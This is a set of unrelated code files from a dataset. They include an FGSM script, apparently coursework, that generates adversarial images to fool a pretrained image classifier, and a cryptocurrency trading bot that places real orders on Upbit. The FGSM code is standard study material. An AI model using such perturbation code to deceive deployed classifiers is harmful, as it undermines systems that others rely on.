self.Q.update(self.last_state, self.last_action, self.reward, None,\n next_actions)\n\n # print('searching for:', correct)\n # for i in range(30):\n # kb = FoPlanner([(self.ground(a),\n # state[a].replace('?', 'QM') if\n # isinstance(state[a], str) else\n # state[a])\n # for a in state], functionsets[self.action_set])\n\n # cum_reward = 0\n # trace = [{str(a): v for a, v in kb.facts}]\n # rewards = [0]\n # while True:\n # action_space = [a for a in\n # kb.fc_get_actions(epsilon=epsilon)]\n\n # actions = []\n # for some_action in action_space:\n # new_state = {}\n # for f in kb.facts.union(some_action[2]):\n # if isinstance(f, tuple) and len(f) == 2:\n # new_state[str(f[0])] = f[1]\n # else:\n # new_state[str(f)]: True\n # utility = 0\n # if self.fit:\n # utility =\n # self.UtilityFun.predict(self.dv.transform([new_state]))[0]\n # actions.append((some_action, exp(utility)))\n\n # operator, mapping, effects = weighted_choice(actions)\n\n # # operator, mapping, effects = choice(action_space)\n\n # for f in effects:\n # kb.add_fact(f)\n\n # new_state = {}\n # for f in kb.facts.union(action[2]):\n # if isinstance(f, tuple) and len(f) == 2:\n # new_state[str(f[0])] = f[1]\n # else:\n # new_state[str(f)]: True\n # trace.append(new_state)\n\n # reward = 0\n\n # done = False\n # for f in effects:\n # if f[0] == 'sai':\n # done = True\n # gen_sai = f[:4]\n # goal = ('sai', selection, action, '-1' if 'value' not\n # in inputs else inputs['value'])\n # # print(gen_sai, 'vs', goal)\n # if gen_sai == goal:\n # if correct:\n # reward += 2 * search_depth\n # else:\n # reward -= 2 * search_depth\n # else:\n # if correct:\n # reward -= 2 * search_depth\n # # else:\n # # reward += search_depth * 2\n\n # rewards.append(reward)\n # cum_reward += reward\n\n # if done or cum_reward < -1 * search_depth:\n # break\n\n # self.X += trace\n # self.y += [sum(rewards[i:]) for i in range(len(rewards))]\n # print(\"reward obtained from sample %i: %i\" % (i, cum_reward))\n\n # self.UtilityFun.fit(self.dv.fit_transform(self.X), self.y)\n # self.fit = True\n\n def ground(self, arg):\n if isinstance(arg, tuple):\n return tuple(self.ground(e) for e in arg)\n elif isinstance(arg, str):\n return arg.replace('?', 'QM')\n else:\n return arg\n\n def unground(self, arg):\n if isinstance(arg, tuple):\n return tuple(self.unground(e) for e in arg)\n elif isinstance(arg, str):\n return arg.replace('QM', '?')\n else:\n return arg\n","sub_path":"agents/RLAgent.py","file_name":"RLAgent.py","file_ext":"py","file_size_in_byte":12381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"105672440","text":"import os\nimport pandas as pd\nfrom PIL import Image\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torchvision.datasets as datasets\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndevice = torch.device(\"cuda\")\ndef prob(output):\n x = []\n y = []\n probs = F.softmax(output,dim=1)\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n probs[0][index.item()] = 0\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n probs[0][index.item()] = 0\n max_p,index = torch.max(probs,dim=1)\n x.append(index.item())\n y.append(max_p.item())\n \n return x,y\n# 實作一個繼承 torch.utils.data.Dataset 的 Class 來讀取圖片\nclass Adverdataset(Dataset):\n def __init__(self, root, label, 
transforms):\n # 圖片所在的資料夾\n self.root = root\n # 由 main function 傳入的 label\n self.label = torch.from_numpy(label).long()\n # 由 Attacker 傳入的 transforms 將輸入的圖片轉換成符合預訓練模型的形式\n self.transforms = transforms\n # 圖片檔案名稱的 list\n self.fnames = []\n\n for i in range(200):\n self.fnames.append(\"{:03d}\".format(i))\n\n def __getitem__(self, idx):\n # 利用路徑讀取圖片\n img = Image.open(os.path.join(self.root, self.fnames[idx] + '.png'))\n # 將輸入的圖片轉換成符合預訓練模型的形式\n img = self.transforms(img)\n # 圖片相對應的 label\n label = self.label[idx]\n return img, label\n \n def __len__(self):\n # 由於已知這次的資料總共有 200 張圖片 所以回傳 200\n return 200\nx1 = []\nx2 = []\ny1 = []\ny2 = []\n\nclass Attacker:\n def __init__(self, img_dir, label):\n # 讀入預訓練模型 vgg16\n self.model = models.densenet121(pretrained = True)\n self.model.cuda()\n self.model.eval()\n self.mean = [0.485, 0.456, 0.406]\n self.std = [0.229, 0.224, 0.225]\n # 把圖片 normalize 到 0~1 之間 mean 0 variance 1\n self.normalize = transforms.Normalize(self.mean, self.std, inplace=False)\n transform = transforms.Compose([ \n transforms.Resize((224, 224), interpolation=3),\n transforms.ToTensor(),\n self.normalize\n ])\n # 利用 Adverdataset 這個 class 讀取資料\n input_prefix = sys.argv[1]\n self.dataset = Adverdataset(os.path.join( input_prefix,'images'), label, transform)\n \n self.loader = torch.utils.data.DataLoader(\n self.dataset,\n batch_size = 1,\n shuffle = False)\n\n # FGSM 攻擊\n def fgsm_attack(self, image, epsilon, data_grad):\n # 找出 gradient 的方向\n sign_data_grad = data_grad.sign()\n # 將圖片加上 gradient 方向乘上 epsilon 的 noise\n perturbed_image = image + epsilon * sign_data_grad\n return perturbed_image\n \n def attack(self, epsilon): \n # 存下一些成功攻擊後的圖片 以便之後顯示\n cnt=-1\n adv_examples = []\n wrong, fail, success = 0, 0, 0\n for (data, target) in self.loader:\n cnt+=1\n output_prefix = sys.argv[2]\n data, target = data.to(device), target.to(device)\n data_raw = data\n data.requires_grad = True\n # 將圖片丟入 model 進行測試 得出相對應的 class\n output = self.model(data)\n init_pred = output.max(1, keepdim=True)[1]\n \n if (cnt == 0 or cnt == 4 or cnt == 16):\n x,y = prob(output)\n x1.append(x)\n y1.append(y)\n # 如果 class 錯誤 就不進行攻擊\n if init_pred.item() != target.item():\n\n adv_ex = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n adv_ex = np.transpose(adv_ex, (1, 2, 0))\n np.clip(adv_ex,0,1,out=adv_ex)\n\n plt.imsave(os.path.join(output_prefix, '%03d'%cnt +'.png'),adv_ex)\n\n wrong += 1\n continue\n \n # 如果 class 正確 就開始計算 gradient 進行 FGSM 攻擊\n loss = F.nll_loss(output, target)\n self.model.zero_grad()\n loss.backward()\n data_grad = data.grad.data\n perturbed_data = self.fgsm_attack(data, epsilon, data_grad)\n\n # 再將加入 noise 的圖片丟入 model 進行測試 得出相對應的 class \n output = self.model(perturbed_data) \n final_pred = output.max(1, keepdim=True)[1]\n\n if (cnt == 0 or cnt == 4 or cnt == 16):\n x,y = prob(output)\n x2.append(x)\n y2.append(y)\n\n adv_ex = perturbed_data * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n adv_ex = np.transpose(adv_ex, (1, 2, 0))\n np.clip(adv_ex,0,1,out=adv_ex)\n\n plt.imsave(os.path.join(output_prefix, '%03d'%cnt +'.png'),adv_ex)\n if final_pred.item() == target.item():\n # 辨識結果還是正確 攻擊失敗\n fail += 1\n else:\n # 辨識結果失敗 攻擊成功\n success += 1\n # 將攻擊成功的圖片存入\n if len(adv_examples) < 5:\n adv_ex = perturbed_data * torch.tensor(self.std, device = 
device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n adv_ex = adv_ex.squeeze().detach().cpu().numpy() \n data_raw = data_raw * torch.tensor(self.std, device = device).view(3, 1, 1) + torch.tensor(self.mean, device = device).view(3, 1, 1)\n data_raw = data_raw.squeeze().detach().cpu().numpy()\n\n adv_examples.append( (init_pred.item(), final_pred.item(), data_raw , adv_ex) ) \n\n final_acc = (fail / (wrong + success + fail))\n \n print(\"Epsilon: {}\\tTest Accuracy = {} / {} = {}\\n\".format(epsilon, fail, len(self.loader), final_acc))\n return adv_examples, final_acc\n\n\nif __name__ == '__main__':\n # 讀入圖片相對應的 label\n input_prefix = sys.argv[1]\n\n df = pd.read_csv(os.path.join( input_prefix,\"labels.csv\"))\n df = df.loc[:, 'TrueLabel'].to_numpy()\n label_name = pd.read_csv(os.path.join( input_prefix,\"categories.csv\"))\n label_name = label_name.loc[:, 'CategoryName'].to_numpy()\n # new 一個 Attacker class\n attacker = Attacker(os.path.join( input_prefix,'images'), df)\n # 要嘗試的 epsilon\n epsilons = [0.1]\n\n accuracies, examples = [], []\n # 進行攻擊 並存起正確率和攻擊成功的圖片\n for eps in epsilons:\n ex, acc = attacker.attack(eps)\n accuracies.append(acc)\n examples.append(ex)\nimport matplotlib.pyplot as plt\nindex = [0,1,2]\nname = ['1.png','2.png','3.png','4.png','5.png','6.png']\nfor i in range(len(x1)):\n plt.cla()\n plt.ylabel(\"Probability\")\n plt.xlabel(\"class\")\n plt.title(\"Origin picture\")\n plt.xticks(index,x1[i])\n plt.bar(index,y1[i])\n plt.savefig(name[i*2])\n\n plt.cla()\n plt.ylabel(\"Probability\")\n plt.xlabel(\"class\")\n plt.title(\"Adversarial picture\")\n plt.xticks(index,x2[i])\n plt.bar(index,y2[i])\n plt.savefig(name[i*2+1],color='red')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n","sub_path":"attack.py","file_name":"attack.py","file_ext":"py","file_size_in_byte":7912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225043702","text":"import time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport mglearn\nimport joblib\nimport datetime\nimport pyupbit\nimport csv\n# access = \n# secret = # 본인 값으로 변경\nupbit = pyupbit.Upbit(access, secret)\n\n\ndef get_balance(ticker):\n \"\"\"잔고 조회\"\"\"\n balances = upbit.get_balances()\n for b in balances:\n if b['currency'] == ticker:\n if b['balance'] is not None:\n return float(b['balance']), b[\"avg_buy_price\"]\n else:\n return 0\n\n\n\n\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\n# model = joblib.load(open('rnd_depth_3.pkl','rb'))\nmodel = joblib.load(open('gbrt_3.pkl','rb'))\nf = open(f\"./trash.csv\",'a', newline='')\nw = csv.writer(f)\n\n\ncoin = \"KRW-ETC\"\n\nbalance =0\nwallet = 0\nbuy_price=0\ncount = 180\ntimecount = 0\ncnt = True\nsum_price = 0\n#매도 가격\nask_price = 0\n#매수 가격\nbid_price = 0\n\navailable_quantity=0\ncurrent_price =0\n\n#time 시간동안 거래되지 않은 거래를 취소\ndef cancel_order(order, time, current_price): #order 는 bid or ask\n global w\n response = upbit.get_order(coin)\n print(response)\n for r in response:\n if r[\"side\"] == order:\n if r['state'] == 'wait':\n if r[\"price\"] != current_price:\n create_time = r['created_at'][:10] + \" \" + r['created_at'][11:19]\n dt = datetime.datetime.strptime(create_time, '%Y-%m-%d %H:%M:%S')\n now = datetime.datetime.now().timestamp()\n dt = dt.timestamp()\n print(\"주문 후 경과 시간\", now - dt)\n if now - dt >= time:\n print(\"주문 취소!!\")\n w.writerow([\"주문 취소\", dt, now,now -dt, time, 
r['side'], r['price']])\n print(upbit.cancel_order(r['uuid']))\n\ndef bid(current_price, bid_price) :\n global balance, wallet, cnt,buy_price\n if current_price == bid_price:\n available_quantity = balance / (current_price * 1.0005)\n wallet += available_quantity\n balance -= available_quantity * 1.0005 * current_price\n cnt = False\n buy_price = current_price * 1.0005\n print(\"매수 성공!\", \"구매가: \", buy_price, \"구매 갯수: \", wallet, \"잔고 :\", balance+wallet*current_price )\n\ndef ask(current_price, ask_price):\n global balance, wallet, cnt,buy_price\n if current_price == ask_price:\n print(\"매도 성공!\", \"구매가: \", buy_price, wallet, \"잔고 :\", balance+0.9995*current_price, \"이득: \", balance + wallet*buy_price)\n balance += wallet * 0.9995 * current_price\n cnt = True\n wallet =0\n\nresponse = []\nsum_prices = []\nwait_uuid = 0\n#for current_price, orders in zip(y,X):\nwhile True:\n timecount += 1\n\n orderbook = pyupbit.get_orderbook(tickers=coin)\n current_price = pyupbit.get_current_price(coin)\n\n if timecount <= count:\n sum_prices.append(current_price)\n try:\n sum_price += current_price\n except:\n count+=1\n\n continue\n else :\n sum_price -= sum_prices[0]\n sum_prices.pop(0)\n sum_price += current_price\n sum_prices.append(current_price)\n #평균 가격을 구함\n avg = sum_price/count\n\n\n orders = []\n orders.append(orderbook[0][\"total_ask_size\"])\n orders.append(orderbook[0][\"total_bid_size\"])\n orderbook_units = orderbook[0][\"orderbook_units\"]\n # print(orderbook_units)\n for unit in orderbook_units:\n orders.append(unit[\"ask_price\"])\n orders.append(unit[\"bid_price\"])\n orders.append(unit[\"ask_size\"])\n orders.append(unit[\"bid_size\"])\n\n orders = np.array([orders])\n predict_price = model.predict(orders)\n\n balance = upbit.get_balance(\"KRW\")\n\n #수수료를 포함해도, 이득을 취할 수 있는 가격일 때 매수\n if round(current_price*1.0005) < round(avg):\n print(current_price, \"평균가:\",round(avg), predict_price)\n if balance >= round(current_price*1.0005):\n\n if cnt:\n cancel_order(\"bid\", 1000, current_price)\n if balance > 5000:\n\n if get_balance(coin):\n _, buy_price = get_balance(coin)\n\n\n\n if predict_price[0] <= current_price:\n available_quantity = int(balance / (predict_price[0] * 1.0005))-1\n response = upbit.buy_limit_order(coin, round(predict_price[0]), available_quantity)\n print(\"예측가 매수 시도\",response)\n buy_price = predict_price[0]\n # if response:\n # # cnt = False\n # if get_balance(coin):\n # _, buy_price = get_balance(coin)\n else:\n available_quantity = int(balance / (current_price * 1.0005))-1\n response = upbit.buy_limit_order(coin, current_price ,available_quantity)\n #response = upbit.buy_market_order(coin, balance-100)\n buy_price = current_price\n print(\"현재가 매수 시도\",response, current_price)\n # if response:\n # # cnt = False\n # buy_price = current_price * 1.0005\n # if get_balance(coin):\n # _, buy_price = get_balance(coin)\n print(\"잔액\", balance)\n\n # 구매 했던 가격보다 가격이 오른 경우 판매해서 이득을 취함\n if round(current_price*0.9995) > buy_price or round(predict_price[0]*0.9995) > buy_price:\n #print(current_price ,buy_price)\n if not cnt:\n real_coin = get_balance(coin[4:])\n if real_coin:\n available_quantity = real_coin[0]\n cancel_order(\"ask\", 3000, current_price)\n if predict_price[0] >= current_price:\n print(\"이득 취하기!!!\")\n print(upbit.sell_limit_order(coin, round(predict_price[0]), available_quantity))\n # print(upbit.sell_market_order(coin, real_coin))\n balance, _ = get_balance(\"KRW\")\n print(\"잔액\", balance)\n # cnt = True\n else:\n print(\"이득 취하기!!!\")\n 
print(real_coin)\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n #print(upbit.sell_market_order(coin, real_coin))\n # print(upbit.sell_market_order(coin, real_coin))\n balance, _ = get_balance(\"KRW\")\n print(\"잔액\", balance)\n # cnt = True\n print(\"판매!!!\")\n\n\n loss = 0.992\n\n if current_price < buy_price*loss or predict_price[0] = current_price:\n # response = upbit.sell_limit_order(coin, round(predict_price[0]), available_quantity)\n # print(response)\n # # if response:\n # # cnt = True\n # else:\n cancel_order(\"ask\", 200, current_price)\n try:\n real_coin, _ = get_balance(coin[4:])\n print(upbit.sell_market_order(coin, real_coin))\n except:\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n #response = upbit.sell_limit_order(coin, current_price, available_quantity)\n #print(response)\n\n if current_price < buy_price*0.95:\n response = upbit.get_order(coin)\n for r in response:\n if r[\"side\"] == 'ask':\n if r['state'] == 'wait':\n print(upbit.cancel_order(r['uuid']))\n try:\n real_coin, _ = get_balance(coin[4:])\n print(upbit.sell_market_order(coin, real_coin))\n except:\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n # if response:\n # cnt = True\n # response = upbit.get_order(coin)\n # print(response)\n # try:\n # real_coin, _ = get_balance(coin[4:])\n # # print(upbit.sell_market_order(coin, real_coin))\n # except:\n # print(upbit.sell_limit_order(coin, current_price, available_quantity))\n # for r in response:\n # if r[\"side\"] == 'ask':\n # if r['state'] == 'wait':\n # print(\"주문 취소!!\")\n # print(upbit.cancel_order(r['uuid']))\n # try:\n # real_coin, _ = get_balance(coin[4:])\n # print(upbit.sell_market_order(coin, real_coin))\n # except:\n # print(upbit.sell_limit_order(coin, current_price, available_quantity))\n response = upbit.get_order(coin, state=\"done\")\n print(\"완료된 거래\", response)\n print(cnt, current_price, predict_price, avg, balance, \"구매가:\", buy_price)\n wait = upbit.get_order(coin, state=\"wait\")\n print(\"대기 중인 거래\", wait)\n if wait:\n if wait_uuid != wait[0]['uuid']:\n wait_uuid = wait[0]['uuid']\n w.writerow(wait[0])\n if response:\n r = response[0]\n if r[\"side\"] == 'bid':\n cnt = False\n else :\n cnt = True\n if r['ord_type'] !='market':\n buy_price = float(r['price'])\n\n\n time.sleep(0.9)\n\n#print(\"\"balance+ wallet*current_price)\n","sub_path":"real_trade_test2.py","file_name":"real_trade_test2.py","file_ext":"py","file_size_in_byte":9950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"621601721","text":"\"\"\"\r\nAssignment4\r\n\"\"\"\r\nfrom Department import Department\r\nfrom Faculty import Faculty\r\ndef printMenu():\r\n print(\"Choice\\t\\tAction\\n\" + \"------\\t\\t------\\n\" + \"A\\t\\tAdd Department\\n\" + \"D\\t\\tDisplay Department\\n\" + \"Q\\t\\tQuit\\n\" + \"?\\t\\tDisplay Help\\n\\n\")\r\nprintMenu()\r\ndept = Department()\r\nuserIn = input(\"What action would you like to perform?\\n\")\r\nwhile len(userIn) == 1:\r\n userIn = userIn.upper()\r\n if userIn == \"A\":\r\n print(\"Please enter the department information:\\n\")\r\n deptName = input(\"Enter its name:\\n\")\r\n dept.setDeptName(deptName)\r\n numMembers = input(\"Enter its number of members:\\n\")\r\n dept.setNumberOfMembers(int(numMembers))\r\n univ = input(\"Enter its university:\\n\")\r\n dept.setUniversity(univ)\r\n fName = input(\"Enter its faculty's first name:\\n\")\r\n lName = input(\"Enter its faculty's last name:\\n\")\r\n 
aLevel = input(\"Enter its faculty's academic level:\\n\")\r\n        dept.setCurrentFaculty(fName,lName,aLevel)\r\n    elif userIn == \"D\":\r\n        print(str(dept))\r\n    elif userIn == \"Q\":\r\n        break\r\n    elif userIn == \"?\":\r\n        printMenu()\r\n    else:\r\n        print(\"Unknown action\\n\")\r\n    userIn = input(\"What action would you like to perform?\\n\")\r\n    \r\n","sub_path":"Assignment 4/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"518570359","text":"#\r\n# Title: 264 [Intermediate] - Gossiping Bus Drivers\r\n# Author: Vishal Bala\r\n# Date Created: May 25, 2016\r\n# Date Modified: May 25, 2016\r\n# Description: Bus drivers like to gossip, everyone knows that. And bus drivers can gossip when they end up at\r\n# the same stop. So now we are going to calculate after how many stops all the bus drivers know\r\n# all the gossips.\r\n# You will be given a number of busroutes that the drivers follow. Each route is appointed to 1\r\n# driver. When 2 or more drivers are at the same stop (even if it is the start), they can\r\n# exchange all the gossips they know. Each driver starts with one gossip.\r\n# A route looks like this: 1 2 3 4 and is repeated over the whole day like this\r\n# 1 2 3 4 1 2 3 4 1 2 3 ... If a driver starts and stops at the same stop then that is also\r\n# repeated. (e.g. route: 1 2 3 1, day: 1 2 3 1 1 2 3 1 1 2 ...)\r\n# All drivers take 1 minute to go from one stop to another and the gossip exchange happens\r\n# instantly.\r\n# All drivers drive 8 hours a day so you have a maximum of 480 minutes to get all the gossiping\r\n# around.\r\n#\r\n# https://www.reddit.com/r/dailyprogrammer/comments/4gqm90/20160427_challenge_264_intermediate_gossiping_bus/\r\n#\r\n# Modification History:\r\n# NONE\r\n#\r\n# To-do:\r\n# 1) Bonus challenge.\r\n#\r\n#=======================================================================================================================\r\n\r\nclass Driver: # A class to hold all of the data unique to each bus driver\r\n    def __init__(self, n, route, gossip, pos, done=False):\r\n        self.n = n\r\n        self.route = route\r\n        self.gossip = gossip\r\n        self.pos = pos\r\n        self.done = done\r\n\r\n    def exchange(self, other):\r\n        [self.gossip.append(g) for g in other.gossip]\r\n        self.gossip = list(set(self.gossip))\r\n        other.gossip = [g for g in self.gossip]\r\n\r\n    def move(self, stops):\r\n        self.pos = self.route[stops % len(self.route)]\r\n\r\ndrivers = []\r\nf = open('264_INT_input', 'r') # A file containing the routes as outlined on the challenge thread.\r\ni = 1\r\nfor line in f:\r\n    r = line.split()\r\n    buf = Driver(i, r, [i], r[0])\r\n    drivers.append(buf)\r\n    i += 1\r\n\r\nup_to_date = False # A boolean to track if all of the bus drivers are up to date on gossip.\r\nfor t in range(480):\r\n    others = [driver for driver in drivers]\r\n    for driver1 in drivers:\r\n        others.remove(driver1)\r\n        for driver2 in others:\r\n            if driver1.pos == driver2.pos:\r\n                driver1.exchange(driver2)\r\n\r\n        if len(driver1.gossip) == len(drivers):\r\n            driver1.done = True # Driver knows all gossip.\r\n\r\n    if all([driver.done for driver in drivers]) and not up_to_date:\r\n        print(\"All drivers up to date after \" + str(t+1) + \" stops.\")\r\n        up_to_date = True\r\n        WAIT = input(\"Press ENTER to continue.\")\r\n\r\n    for driver in drivers:\r\n        driver.move(t+1)\r\n\r\nif up_to_date is False:\r\n    print(\"Drivers were unable to share gossip with 
everyone.\")\r\n","sub_path":"264_INT.py","file_name":"264_INT.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"28145551","text":"#splitting male and female classification files into 3 classification files (1 with all shared isoforms, 1 with male specific isoforms and 1 with female specific isoforms)\n#to run script: python3 Sort.by.Sex.Classification.py < output all male specific isoforms> \n#Author: Alice Naftaly, May 2020\n\nimport sys\n\n#read male classification file\n#returns dictionary with key == isoform and value == classification line\ndef read_male_file():\n male_file = sys.argv[1]\n male_dict = {}\n with open(male_file, 'r') as male_class:\n for line in male_class:\n if line.startswith(\"PB\"):\n new_line = line.split()\n isoform = new_line[0]\n male_dict.update({isoform:line})\n return male_dict\n\n\n#read female classification file\n#returns dictionary with key == isoform and value == classification line\ndef read_female_file():\n female_file = sys.argv[2]\n female_dict = {}\n with open(female_file, 'r') as female_class:\n for line in female_class:\n if line.startswith(\"PB\"):\n new_line = line.split()\n isoform = new_line[0]\n female_dict.update({isoform:line})\n return female_dict\n\n#split isoforms into 3 lists\n#returns 3 lists of isoforms (shared, male specific, female specific)\ndef split_isoforms():\n male_dict = read_male_file()\n all_male_isoforms = list(male_dict.keys())\n female_dict = read_female_file()\n all_female_isoforms = list(female_dict.keys())\n shared_isoforms = []\n male_specific_isoforms = []\n female_specific_isoforms = []\n for isoform in all_male_isoforms:\n if isoform in all_female_isoforms:\n shared_isoforms.append(isoform)\n elif isoform not in all_female_isoforms:\n male_specific_isoforms.append(isoform)\n for iso in all_female_isoforms:\n if iso not in all_male_isoforms:\n female_specific_isoforms.append(iso)\n return shared_isoforms, male_specific_isoforms, female_specific_isoforms\n\n#write isoforms to files\ndef write_shared_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[3]\n with open(output, 'a') as out:\n for iso in shared_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\ndef write_male_specific_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[4]\n with open(output, 'a') as out:\n for iso in male_specific_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\ndef write_female_specific_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[5]\n with open(output, 'a') as out:\n for iso in female_specific_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\n#call all functions\ndef call():\n shared = write_shared_isoforms()\n male_specific = write_male_specific_isoforms()\n female_specific = write_female_specific_isoforms()\n\ncall()\n","sub_path":"Sex_Specificity/Sort.by.Sex.Classification.py","file_name":"Sort.by.Sex.Classification.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86323433","text":"from django.conf.urls import url, include\nfrom . 
import views\n\nurlpatterns = (\n url(r'^home/', views.home, name='home'),\n url(r'^$', views.post_list, name='post_list'),\n url(r'^login/', views.loginview.as_view(), name='login'),\n url(r'^profile/', views.profile, name='profile'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^register/', views.userformview.as_view(), name='register'),\n\n\n\n)\n","sub_path":"mark1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"385935993","text":"#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n\nimport time\n\n'''\nTags: Hash Table, Two Pointers, String\nSimilar Problems: Longest Substring with At Most Two Distinct Characters\n'''\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n lastRepeating = -1\n maxLen = 0\n seen = {}\n for i in range(len(s)):\n if s[i] in seen and lastRepeating < seen[s[i]]:\n lastRepeating = seen[s[i]]\n if i - lastRepeating > maxLen:\n maxLen = i - lastRepeating\n seen[s[i]] = i\n return maxLen\n\n\nif __name__ == '__main__':\n leng = Solution()\n start = time.time()\n s = 'x'\n print(leng.lengthOfLongestSubstring(s))\n print(time.time() - start)","sub_path":"Leetcode/Python/03. Longest Substring Without Repeating Characters.py","file_name":"03. Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"33527682","text":"\"\"\" mediation model \"\"\"\nfrom datetime import datetime\nfrom flask import current_app as app\nimport os\nfrom pathlib import Path\nfrom sqlalchemy import event\nfrom sqlalchemy.orm import mapper\nimport time\n\n\ndb = app.db\n\n\nclass Mediation(app.model.PcObject,\n db.Model,\n app.model.HasThumbMixin,\n app.model.ProvidableMixin\n ):\n\n id = db.Column(db.BigInteger,\n primary_key=True,\n autoincrement=True)\n\n frontText = db.Column(db.Text, nullable=True)\n\n backText = db.Column(db.Text, nullable=True)\n\n dateCreated = db.Column(db.DateTime,\n nullable=False,\n default=datetime.now)\n\n authorId = db.Column(db.BigInteger,\n db.ForeignKey(\"user.id\"),\n nullable=True)\n\n author = db.relationship(lambda: app.model.User,\n foreign_keys=[authorId],\n backref='mediations')\n\n offererId = db.Column(db.BigInteger,\n db.ForeignKey(\"offerer.id\"),\n nullable=True)\n\n offerer = db.relationship(lambda: app.model.Offerer,\n foreign_keys=[offererId],\n backref='mediations')\n\n eventId = db.Column(db.BigInteger,\n db.ForeignKey(\"event.id\"),\n nullable=True)\n\n event = db.relationship(lambda: app.model.Event,\n foreign_keys=[eventId],\n backref='mediations')\n\n thingId = db.Column(db.BigInteger,\n db.ForeignKey(\"thing.id\"),\n nullable=True)\n\n thing = db.relationship(lambda: app.model.Thing,\n foreign_keys=[thingId],\n backref='mediations')\n\n tutoIndex = db.Column(db.Integer,\n nullable=True,\n index=True)\n\n\nMediation.__table_args__ = (\n db.CheckConstraint('\"thumbCount\" <= 2',\n name='check_mediation_has_max_2_thumbs'),\n db.CheckConstraint('\"thumbCount\" > 0 OR frontText IS NOT NULL',\n name='check_mediation_has_thumb_or_text'),\n db.CheckConstraint('\"eventId\" IS NOT NULL OR thingId IS NOT NULL'\n + ' OR tutoIndex IS NOT NULL',\n name='check_mediation_has_event_or_thing_or_tutoIndex'),\n)\n\n\nTUTOS_PATH = Path(os.path.dirname(os.path.realpath(__file__))) / '..'\\\n / 'static' / 'tuto_mediations'\n\n\ndef 
upsertTutoMediation(index, has_back=False):\n existing_mediation = Mediation.query.filter_by(tutoIndex=index)\\\n .first()\n mediation = existing_mediation or Mediation()\n mediation.tutoIndex = index\n app.model.PcObject.check_and_save(mediation)\n\n with open(TUTOS_PATH / (str(index) + '.png'), \"rb\") as f:\n mediation.save_thumb(f.read(),\n 0,\n no_convert=True,\n image_type='png')\n\n if has_back:\n with open(TUTOS_PATH / (str(index) + '_verso.png'), \"rb\") as f:\n mediation.save_thumb(f.read(),\n 1,\n no_convert=True,\n image_type='png')\n\n app.model.PcObject.check_and_save(mediation)\n\n\ndef upsertTutoMediations():\n upsertTutoMediation(0)\n upsertTutoMediation(1, True)\n\n\nMediation.upsertTutoMediations = upsertTutoMediations\n\napp.model.Mediation = Mediation\n","sub_path":"models/mediation.py","file_name":"mediation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"579012710","text":"# Put your persistent store models in this file\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, Float, Text, Date, ForeignKey\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import relationship\n\nfrom .app import MyFirstApp\n\n# DB Engine, sessionmaker and base\nengine = MyFirstApp.get_persistent_store_engine('stream_gage_db')\nSessionMaker = sessionmaker(bind=engine)\nBase = declarative_base()\n\n# SQLAlchemy ORM definition for the stream_gages table\nclass StreamGage(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n __tablename__ = 'stream_gages'\n\n # Columns\n id = Column(Integer, primary_key=True)\n latitude = Column(Float)\n longitude = Column(Float)\n value = Column(Integer)\n\n def __init__(self, latitude, longitude, value):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.latitude = latitude\n self.longitude = longitude\n self.value = value\n\n\n\nclass model_inputs_table(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n 